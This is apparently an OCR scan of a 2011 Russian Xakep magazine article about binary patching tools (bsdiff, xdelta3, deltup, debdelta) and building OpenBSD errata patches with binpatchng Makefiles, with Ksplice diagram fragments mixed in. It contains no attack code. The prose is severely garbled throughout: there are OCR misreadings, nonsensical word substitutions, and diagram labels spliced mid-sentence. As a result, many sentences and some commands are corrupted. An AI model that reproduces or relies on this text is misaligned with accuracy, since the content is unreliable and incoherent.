релизов равным образом заплатокдля

OpenBSD, знают, бери какое количество насчёт н самобытен да

пр ост. При выпуске релизов разработчики поскорее орие н тируются получай
абрис , нежели получи сбор достаточн по части го количества важных измене­

$ bsdiff старый_файл новый_файл файл_патча
$ bspatch старый_файл новый_файл файJ]_патча

ний . После выпуска новой версии ОС разом нач да получи и распишись ется вещь надо
следующей, а весь ошибки да баги, н ай д енные во э т насчёт время, фиксятся не без;

через заплаток, которые отдельный поль зовате л ь/адми н в долгу

$
$

xdeltaЗ -е

-s стаgый обложка новый_файл файл_патча
xdeltaЗ -d -s стаgый_файл файл_патча новый_файл

из качать, нало жительствовать получай первоначальный адрес равно пересобрать его. Делать зто

безграмотный токмо бояться неудобно, да в отдельных случаях насчет сто отнюдь не пр едставляется воз­
можным. Многие железки по-под управлением

$ deltup -mjb 0

$ deltup

старый_файл новый_файл файл_патча

OpenBSD никак не обладают

прежде стато чной мощностью равно дисковым для из тран ством, для того т ого так чтобы
вмещать во себя всё брус исходных текстов

-р файл_патча

OpenBSD, компилятор,

лин ковщик равным образом промежуточные результаты компиля ции . Но хоть кабы

$ debdelta

старый_файл новый_файл файл_патча

$ debpatch

-А файл_патча

ХАКЕР

00 / 053/2011

0 новый_файл

всё зто получи железке есть, же самоё автомобиль близ этом н е е дин ст на е нная

во подчинении, од нотипны е дей ствия nридетсявыnолнять сколько-нибудь

015

UNIXOID
З . Скачиваем инсталляционные ар х ивы для того давай ж утнапиштим архитектуры

!наnример f t gj/~bsd.o-UI.LR_ub~BS D /4 . 0/i386 /) равным образом nомещаем
их на distfilеs/имя_архитектуры.

Предва рительные

0. Пишем Makefile. Для сего nереход им получай cтpaницy www.ooenbs d .oгq/
eггata.html , выбираем нуж н ый ре л изо !для 0.9 ноне патчей нет, п оэтому аз многогрешный
возьму вслед п ример4.8 ) , выбираем захватывающий нас п атч !например 001_
bgpd.patch), касательно т крываем его. В nервой строке будетуказа н из п особ сборки
патча. Наша эадача-переложитьего получи язычок Makefile. Это просто:

объектныефа йлы

создаем фaйл/usг/Ьinpatchng-1.1/Makefile равным образом пишем на него следующее:

по отношению р равно г да н а л ь н ых
ИСХО Д НИКОВ

Извлечение

Извлечение
функций, кото­

оптимизационных

блоков, которые

рые отличаются

С п исок
функций,

отличаются

Обработка опти ­

Обработка

миэационных

блоков, которые

отличаются

отличаются

Стандарт­
Дополнитель­

ныймодуль

ная пропуск

ядра

#Для что за архитектуры собираем? {Можно далеко не указывать,

#если совп~ает из ;wхитектурой текущ!!й машины.)
АR СН=iЗВб

# Здесь перечисляем патчи (просто откидываем растягивание patch)
PATC H_COММON=881_bgpd

ко т орые
об тличаю т ся

функций , которые

# vi /usr/Ьinpatchng - 0.1 /Makefile

L

# Здесь идут да н струкции про сборки п атча 081_bgpd. patch
081_bgpd :
cd ${WRK SRC } / usr.sbi n/ bgpd
(${_QI:Jj} ;_$_{_deQend }_;_$_{_build} ). __ _ _ _ _ __
#.J!алее дозволяется водворить инстрУКЦИИ объединение сбоQке остальных патчей ...
Самое сложное на этом файле-это инструкции сборки, они могут
взойти мудреными, при всем том понаписать их ужас легко. Достаточно

Используются

попросту перекинуть описанные на официальном патче инструкции сверху

впоследствии

макроопределения. Например, во нашем случае они выглядели так:

Главны й
узел

П р ан ц равным образом п работы Ksplice

cd usr.sЬin/ b gpd
make obj
make depend
make
make iпsta l l